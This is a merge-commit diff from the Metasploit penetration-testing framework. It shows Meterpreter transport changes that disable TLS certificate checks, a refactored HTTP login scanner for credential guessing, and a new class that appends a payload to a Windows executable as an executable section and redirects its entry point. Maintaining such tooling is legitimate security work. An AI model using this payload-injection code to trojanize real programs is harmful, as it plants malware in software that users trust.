Merging upstream/master

Author: OJ

.gitignore

@@ -67,17 +67,7 @@ external/source/exploits/**/Release
 
 # Avoid checking in Meterpreter binaries. These are supplied upstream by
 # the meterpreter_bins gem.
-data/meterpreter/elevator.*.dll
-data/meterpreter/ext_server_espia.*.dll
-data/meterpreter/ext_server_extapi.*.dll
-data/meterpreter/ext_server_incognito.*.dll
-data/meterpreter/ext_server_kiwi.*.dll
-data/meterpreter/ext_server_lanattacks.*.dll
-data/meterpreter/ext_server_mimikatz.*.dll
-data/meterpreter/ext_server_priv.*.dll
-data/meterpreter/ext_server_stdapi.*.dll
-data/meterpreter/metsrv.*.dll
-data/meterpreter/screenshot.*.dll
+data/meterpreter/*.dll
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.29.0)
-      meterpreter_bins (= 0.0.16)
+      meterpreter_bins (= 0.0.17)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -132,7 +132,7 @@ GEM
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.16)
+    meterpreter_bins (0.0.17)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.1)

data/meterpreter/meterpreter.py

@@ -264,7 +264,7 @@ def tlv_pack(*args):
 		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
 	else:
 		value = tlv['value']
-		if sys.version_info[0] < 3 and isinstance(value, __builtins__['unicode']):
+		if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
 			value = value.encode('UTF-8')
 		elif not is_bytes(value):
 			value = bytes(value, 'UTF-8')
@@ -393,11 +393,17 @@ def debug_print(self, msg):
 			print(msg)
 
 	def driver_init_http(self):
+		opener_args = []
+		scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
+		if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)):
+			import ssl
+			ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+			ssl_ctx.check_hostname=False
+			ssl_ctx.verify_mode=ssl.CERT_NONE
+			opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
 		if HTTP_PROXY:
-			proxy_handler = urllib.ProxyHandler({'http': HTTP_PROXY})
-			opener = urllib.build_opener(proxy_handler)
-		else:
-			opener = urllib.build_opener()
+			opener_args.append(urllib.ProxyHandler({scheme: HTTP_PROXY}))
+		opener = urllib.build_opener(*opener_args)
 		if HTTP_USER_AGENT:
 			opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
 		urllib.install_opener(opener)

lib/metasploit/framework/login_scanner/http.rb

@@ -187,13 +187,66 @@ def check_setup
           error_message
         end
 
+        # Sends a HTTP request with Rex
+        #
+        # @param [Hash] Native support includes the following (also see Rex::Proto::Http::Request#request_cgi)
+        # @option opts[String] 'host' The remote host
+        # @option opts[Fixnum] 'port' The remote port
+        # @option opts[Boolean] 'ssl' The SSL setting, TrueClass or FalseClass
+        # @option opts[String]  'proxies' The proxies setting
+        # @option opts[Credential] 'credential' A credential object
+        # @option opts['Hash'] 'context' A context
+        # @raise [Rex::ConnectionError] One of these errors has occured: EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
+        # @return [Rex::Proto::Http::Response] The HTTP response
+        # @return [NilClass] An error has occured while reading the response (see #Rex::Proto::Http::Client#read_response)
+        def send_request(opts)
+          rhost           = opts['host'] || host
+          rport           = opts['rport'] || port
+          cli_ssl         = opts['ssl'] || ssl
+          cli_ssl_version = opts['ssl_version'] || ssl_version
+          cli_proxies     = opts['proxies'] || proxies
+          username        = opts['credential'] ? opts['credential'].public : ''
+          password        = opts['credential'] ? opts['credential'].private : ''
+          realm           = opts['credential'] ? opts['credential'].realm : nil
+          context         = opts['context'] || { 'Msf' => framework, 'MsfExploit' => framework_module}
+
+          res = nil
+          cli = Rex::Proto::Http::Client.new(
+            rhost,
+            rport,
+            context,
+            cli_ssl,
+            cli_ssl_version,
+            cli_proxies,
+            username,
+            password
+          )
+          configure_http_client(cli)
+
+          if realm
+            cli.set_config('domain' => credential.realm)
+          end
+
+          begin
+            cli.connect
+            req = cli.request_cgi(opts)
+            res = cli.send_recv(req)
+          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error => e
+            raise Rex::ConnectionError, e.message
+          ensure
+            cli.close
+          end
+
+          res
+        end
+
+
         # Attempt a single login with a single credential against the target.
         #
         # @param credential [Credential] The credential object to attempt to
         #   login with.
         # @return [Result] A Result object indicating success or failure
         def attempt_login(credential)
-
           result_opts = {
             credential: credential,
             status: Metasploit::Model::Login::Status::INCORRECT,
@@ -209,32 +262,13 @@ def attempt_login(credential)
             result_opts[:service_name] = 'http'
           end
 
-          http_client = Rex::Proto::Http::Client.new(
-            host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version,
-            proxies, credential.public, credential.private
-          )
-
-          configure_http_client(http_client)
-
-          if credential.realm
-            http_client.set_config('domain' => credential.realm)
-          end
-
           begin
-            http_client.connect
-            request = http_client.request_cgi(
-              'uri' => uri,
-              'method' => method
-            )
-
-            response = http_client.send_recv(request)
+            response = send_request('credential'=>credential, 'uri'=>uri, 'method'=>method)
             if response && response.code == 200
               result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: response.headers)
             end
-          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error => e
+          rescue Rex::ConnectionError => e
             result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
-          ensure
-            http_client.close
           end
 
           Result.new(result_opts)

lib/metasploit/framework/login_scanner/symantec_web_gateway.rb

@@ -27,41 +27,6 @@ def check_setup
         end
 
 
-        # Sends a HTTP request with Rex
-        #
-        # @param (see Rex::Proto::Http::Request#request_raw)
-        # @raise [Rex::ConnectionError] Something has gone wrong while sending the HTTP request
-        # @return [Rex::Proto::Http::Response] The HTTP response
-        def send_request(opts)
-          res = nil
-          cli = Rex::Proto::Http::Client.new(host, port,
-            {
-              'Msf' => framework,
-              'MsfExploit' => framework_module
-            },
-            ssl,
-            ssl_version,
-            proxies
-          )
-          configure_http_client(cli)
-          begin
-            cli.connect
-            req = cli.request_cgi(opts)
-            res = cli.send_recv(req)
-          rescue ::Errno::EPIPE, ::Timeout::Error => e
-            # We are trying to mimic the same type of exception rescuing in
-            # Msf::Exploit::Remote::HttpClient. But instead of returning nil, we'll consistently
-            # raise Rex::ConnectionError so the #attempt_login can return the error message back
-            # to the login module.
-            raise Rex::ConnectionError, e.message
-          ensure
-            cli.close
-          end
-
-          res
-        end
-
-
         # Returns the latest sid from Symantec Web Gateway.
         #
         # @returns [String] The PHP Session ID for Symantec Web Gateway login

lib/metasploit/framework/spec/untested_payloads.rb

@@ -44,7 +44,7 @@ def self.define_task
             untested_payloads_pathname = Pathname.new 'log/untested-payloads.log'
 
             if untested_payloads_pathname.exist?
-              tool_path = 'tools/missing-payload-tests.rb'
+              tool_path = 'tools/missing_payload_tests.rb'
 
               $stderr.puts "Untested payload detected.  Running `#{tool_path}` to see contexts to add to " \
                            "`spec/modules/payloads_spec.rb` to test those payload ancestor reference names."

lib/msf/core/exe/segment_appender.rb

@@ -0,0 +1,51 @@
+# -*- coding: binary -*-
+module Msf
+module Exe
+
+  require 'metasm'
+  require 'msf/core/exe/segment_injector'
+
+  class SegmentAppender < SegmentInjector
+
+    def payload_stub(prefix)
+      # TODO: Implement possibly helpful payload obfuscation
+      asm = "new_entrypoint:\n#{prefix}\n"
+      shellcode = Metasm::Shellcode.assemble(processor, asm)
+      shellcode.encoded + @payload
+    end
+
+    def generate_pe
+      # Copy our Template into a new PE
+      pe_orig = Metasm::PE.decode_file(template)
+      pe = pe_orig.mini_copy
+
+      # Copy the headers and exports
+      pe.mz.encoded = pe_orig.encoded[0, pe_orig.coff_offset-4]
+      pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
+      pe.header.time = pe_orig.header.time
+
+      # Don't rebase if we can help it since Metasm doesn't do relocations well
+      pe.optheader.dll_characts.delete("DYNAMIC_BASE")
+
+      # TODO: Look at supporting DLLs in the future
+      prefix = ''
+
+      # Create a new section
+      s = Metasm::PE::Section.new
+      s.name = '.' + Rex::Text.rand_text_alpha_lower(4)
+      s.encoded = payload_stub prefix
+      s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
+
+      pe.sections << s
+      pe.invalidate_header
+
+      # Change the entrypoint to our new section
+      pe.optheader.entrypoint = 'new_entrypoint'
+      pe.cpu = pe_orig.cpu
+
+      pe.encode_string
+    end
+
+  end
+end
+end

lib/msf/core/exe/segment_injector.rb

@@ -59,20 +59,11 @@ def create_thread_stub
       EOS
     end
 
-    def payload_as_asm
-      asm = ''
-      @payload.each_byte do |byte|
-        asm << "db " + sprintf("0x%02x", byte) + "\n"
-      end
-      return asm
-    end
-
     def payload_stub(prefix)
       asm = "hook_entrypoint:\n#{prefix}\n"
       asm << create_thread_stub
-      asm << payload_as_asm
       shellcode = Metasm::Shellcode.assemble(processor, asm)
-      shellcode.encoded
+      shellcode.encoded + @payload
     end
 
     def generate_pe